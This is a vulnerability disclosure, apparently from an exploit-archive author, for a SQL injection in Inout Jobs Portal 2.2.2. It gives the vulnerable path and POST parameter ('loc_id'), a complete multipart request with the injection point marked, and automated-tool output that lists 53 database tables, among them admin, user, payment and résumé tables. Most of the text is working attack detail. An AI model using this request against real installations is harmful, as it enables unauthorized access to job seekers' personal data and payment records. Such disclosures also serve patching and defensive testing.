┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Jobs Portal 2.2.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company reputation │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php?page=jobs/searchresult Method: POST POST parameter 'loc_id' is vulnerable to SQLI +-----------------------------------------------------------+ -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="search_query" web -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="c_id" 1 -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="loc_id" 1[INJECT-HERE] -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="serchtype" simple -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="c_id" 0 -----------------------------245625052541747605171577107419 +-----------------------------------------------------------+ [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.6 [INFO] fetching tables for database: '*****_jobs_portal' Database: *****_jobs_portal [53 tables] +-----------------------------------------+ | nesote_inoutscripts_company_ratereview | | nesote_inoutscripts_homepage_banner | | nesote_inoutscripts_users | | nesote_jobportal_admin | | nesote_jobportal_applied_jobs | | nesote_jobportal_city | | nesote_jobportal_client_logs | | nesote_jobportal_company_size | | nesote_jobportal_company_type | | nesote_jobportal_companyblock | | nesote_jobportal_contents | | nesote_jobportal_country | | nesote_jobportal_coverletters | | nesote_jobportal_currency | | nesote_jobportal_email_templates | | nesote_jobportal_employer_details | | nesote_jobportal_employer_feedback | | nesote_jobportal_functional_role | | nesote_jobportal_industry | | nesote_jobportal_ip_012023 | | nesote_jobportal_ip_022020 | | nesote_jobportal_ip_032020 | | nesote_jobportal_ip_042020 | | nesote_jobportal_ip_082021 | | nesote_jobportal_ip_092022 | | nesote_jobportal_ip_102022 | | nesote_jobportal_ip_112022 | | nesote_jobportal_ip_122022 | | nesote_jobportal_ipn | | nesote_jobportal_job_types | | nesote_jobportal_jobs | | nesote_jobportal_jobseeker_details | | nesote_jobportal_languages | | nesote_jobportal_locations | | nesote_jobportal_messages | | nesote_jobportal_months_messages | | nesote_jobportal_news_and_events | | nesote_jobportal_notifications | | nesote_jobportal_packages | | nesote_jobportal_payment_details | | nesote_jobportal_previous_exp | | nesote_jobportal_qualifications | | nesote_jobportal_resumes | | nesote_jobportal_saved_jobs | | nesote_jobportal_saved_resumes | | nesote_jobportal_seekers_qualifications | | nesote_jobportal_sent_jobalerts | | nesote_jobportal_settings | | nesote_jobportal_skills | | nesote_jobportal_specifications | | nesote_jobportal_states | | nesote_jobportal_success_story | | nesote_jobportal_themes | +-----------------------------------------+ [-] Done